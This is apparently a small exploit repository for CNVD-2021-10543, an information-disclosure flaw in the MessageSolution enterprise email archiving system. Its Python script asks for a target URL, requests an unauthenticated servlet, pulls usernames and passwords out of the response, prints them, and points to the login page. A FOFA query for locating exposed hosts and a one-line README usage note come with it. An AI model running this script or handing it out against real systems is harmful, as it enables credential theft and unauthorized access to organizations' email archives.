├── CNVD-2021-10543.py
└── README.md


/CNVD-2021-10543.py:
--------------------------------------------------------------------------------
 1 | # CNVD-2021-10543
 2 | # MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
 3 | # fofa: title="MessageSolution"
 4 | 
 5 | import requests
 6 | import time
 7 | import json
 8 | from bs4 import BeautifulSoup
 9 | # 忽略SSL证书校验提醒
10 | requests.packages.urllib3.disable_warnings()
11 | 
12 | def title():
13 |     print("+-------------------------------------------------+")
14 |     print("+-----------    CNVD-2021-10543   ----------------+")
15 |     print("+----------- MessageSolution信息泄漏 --------------+")
16 |     print('+--------- Fofa: title="MessageSolution" ---------+')
17 |     print("+--------  use: python3 CNVD-2021-10543.py -------+")
18 |     print("+-------------------------------------------------+")
19 | 
20 | def target_url(url):
21 |     target_url = url + "/authenticationserverservlet/"
22 |     login_url = url + "/indexcommon.jsp"
23 |     # verify = False 忽略SSL证书校验
24 |     try:
25 |         res = requests.get(url=target_url, verify=False,timeout=5)
26 |         if "administrator" in res.text and res.status_code == 200:
27 |             print(f"[!] \033[31m目标系统: {url} 存在信息泄漏\033[0m")
28 |             time.sleep(1)
29 |             print("[!] \033[31m正在获取目标系统敏感信息.........\033[0m")
30 |             bs_xml = BeautifulSoup(res.text,features="html.parser")
31 |             user_names = bs_xml.findAll('username')
32 |             passwords = bs_xml.findAll('password')
33 |             i = 1
34 |             print(f"[!] \033[31m获取到目标系统信息:\033[0m")
35 |             if i < len(user_names):
36 |                 for user_name,password  in user_names,passwords:
37 |                     print(f"   用户名: {user_name.text}    密 码: {password.text}")
38 |                     i = i+1
39 |             else:
40 |                 print(f"   用户名: {user_names[0].text}\n   密 码: {passwords[0].text}")
41 |             print(f"\033[32m[0] 请访问: {login_url} 进行登录！")
42 |         else:
43 |             print(f"[0]  \033[32m目标系统: {url} 不存在信息泄\033[0m")
44 |     except Exception as e:
45 |         print(f"[!]  目标系统: {url} 出现意外错误：\n {e}")
46 | 
47 | 
48 | 
49 | 
50 | if __name__ == "__main__":
51 |     title()
52 |     url = str(input("[0] 请输入目标站点URL:\n"))
53 |     target_url(url)
54 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CNVD-2021-10543
2 | CNVD-2021-10543：MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
3 | 
4 | #Use
5 | 
6 | python3 CNVD-2021-10543.py
7 | 


--------------------------------------------------------------------------------